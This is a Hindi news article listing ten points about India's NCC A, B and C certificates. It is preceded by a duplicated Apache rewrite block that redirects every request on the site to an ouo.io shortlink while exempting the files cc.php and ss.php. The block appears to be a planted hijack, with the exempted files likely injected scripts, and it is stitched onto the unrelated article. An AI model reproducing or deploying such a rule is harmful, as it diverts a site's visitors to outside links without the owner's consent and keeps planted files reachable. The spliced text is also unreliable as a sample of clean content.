
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 601
Previous Nextनई दिल्ली। इन दिनों NCC लगातार ट्रेंड में है। लोग ये जानना चाहते हैं कि एनसीसी का सी सर्टिफिकेट क्या होता है। आइये 10 बिंदुओं से समझे एनसीसी सर्टिफिकेट का महत्व—
1. नेशनल कैडेट कॉर्प्स ऑफ इंडिया (एनसीसी) की लिखित और परेड एग्जाम पास करने वाले स्टूडेंट्से को ए, बी और सी सर्टिफिकेट मुहैया कराया जाता है।
2. इन एग्जाम में 'ए' और 'बी' सर्टिफिकेट पाना फिर भी आसान होता है बजाय 'सी' सर्टिफिकेट पाने के।
3. 'सी' सर्टिफिकेट पाना छात्रों के लिए सबसे मुश्किल होता है। 'सी' सर्टिफिकेट का एग्जाम 'ए' और 'बी' सर्टिफिकेट के एग्जाम से कई ज्यादा मुश्किल होता है।
4. 'ए' सर्टिफिकेट से छात्र बहुत बड़ा पद नहीं प्राप्त कर सकते। ज्यादा से ज्यादा सीएसएम (कंपनी सार्जेंट मेजर) तक जा सकते हैं। जबकि बी सर्टिफिकेट से जेयूओ और सी सर्टिफिकेट से सीएसयूओ (कंपनी सीनियर अंडर ऑफिसर) का पद पा सकते हैं।
5. एनसीसी से 'सी' सर्टिफिकेट प्राप्त छात्रों को सेना, अर्धसैनिक बलों के अलावा विभिन्न सरकारी नौकरियां पाने में आसानी रहती है।
6. हायर एजुकेशन के लिए कई यूनिवर्सिटी और कॉलेजों में एडमिशन के लिए एनसीसी सर्टिफिकेट को बहुत महत्व दिया जाता है।
7. 'ए' सर्टिफिकेट 15 साल से कम उम्र के छात्रों के लिए है। 'बी' सर्टिफिकेट हासिल करने की अधिकतम उम्र 17 साल है। 'बी' सर्टिफिकेट हासिल करने के दो साल बाद छात्र 'सी' सर्टिफिकेट हासिल करने के काबिल हो जाता है।
8. 'सी' सर्टिफिकेट का एग्जाम पास करना छात्रों के लिए काफी कठिन होता है इसलिए इस एग्जाम का महत्व 'ए' और 'बी' एग्जाम से बहुत ज्यादा है।
9. एनसीसी में समाजसेवा, अनुशासन, चरित्र निर्माण, परिश्रम की सीख दी जाती है। सीनियर छात्रों की ट्रेनिंग सुरक्षा बलों के जवानों की तर्ज पर होती है।
10. बी और सी सर्टिफिकेट की ट्रेनिंग कैंप और कॉलेज में अलग-अलग तरीके से कराई जाती है।